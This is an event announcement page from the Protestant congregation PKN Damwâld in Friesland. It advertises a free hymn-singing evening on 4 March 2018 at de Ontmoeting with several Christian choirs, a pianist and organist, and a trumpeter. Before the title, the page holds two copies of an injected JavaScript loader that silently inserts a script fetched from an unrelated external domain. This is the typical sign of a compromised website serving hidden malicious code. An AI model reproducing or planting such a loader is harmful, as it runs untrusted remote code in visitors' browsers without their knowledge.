;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “Sjong op foar Jezus” centraal in zondagavondzang - PKN Damwâld
4 maart 2018
19:30 t/m 21:00
de Ontmoeting
“Sjong op foar Jezus” centraal in zondagavondzang

Op zondagavond 4 maart 2018 organiseert de muziekcommissie weer een zangavond. Al luisterend en zingend zullen de bezoekers van een fijne avond kunnen spreken. “Sjong op foar Jezus” is het credo, waarbij alle aanwezigen één groot koor zullen vormen. U kunt genieten van vele Friestalige en Nederlandstalige liederen die door de koren ten gehore worden gebracht. Aan deze avond werken vele christelijke koren mee: Advendo uit Kollumerzwaag, Sjaloom uit Hallum en Soli Deo Gloria uit Drachten, mannenkoor Sjongersnocht en vrouwenkoor Carmina beiden uit Damwald. Al deze koren staan onder leiding van Johanna van der Weide-Jongsma. Daarbij wordt muzikale medewerking verleend door Fedde de Vries die vleugel en orgel bespeelt. Eddy Huizinga zal een extra muzikaal tintje bijdragen met het bespelen van de trompet.
De toegang is vrij, er wordt een collecte gehouden ter bestrijding van de onkosten. Aanvang is 19.30 uur. U bent van harte welkom om deze bijzondere zangavond bij te wonen!

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld